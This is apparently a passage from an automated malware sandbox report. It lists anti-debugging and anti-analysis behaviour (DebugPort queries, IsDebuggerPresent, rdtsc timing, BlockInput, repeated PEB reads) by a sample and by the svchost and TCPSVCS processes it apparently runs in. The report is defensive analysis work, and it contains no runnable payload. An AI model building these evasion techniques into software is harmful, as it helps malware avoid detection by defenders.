                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417713 LdrLoadDll,2_2_00417713
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A6AAF BlockInput,0_2_003A6AAF
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00353D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00353D19
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00383920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00383920
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036E01E LoadLibraryA,GetProcAddress,0_2_0036E01E
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00FDA018 mov eax, dword ptr fs:[00000030h]0_2_00FDA018
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00FD89A8 mov eax, dword ptr fs:[00000030h]0_2_00FD89A8
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00FD9FB8 mov eax, dword ptr fs:[00000030h]0_2_00FD9FB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
